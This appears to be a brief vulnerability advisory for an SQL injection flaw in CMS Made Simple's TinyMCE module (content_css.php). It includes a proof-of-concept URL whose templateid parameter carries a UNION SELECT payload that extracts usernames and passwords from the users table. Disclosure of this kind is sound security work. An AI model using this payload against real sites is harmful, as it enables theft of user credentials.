CMS Made Simple TinyMCE Module 'content_css.php' SQL Injection Vulnerability

CMS Made Simple TinyMCE Module 'content_css.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

http://www.example.com/[path]/modules/TinyMCE/content_css.php?templateid=-1/**/UNION/**/SELECT/**/username,1,password/**/FROM/**/{prefix}_users/*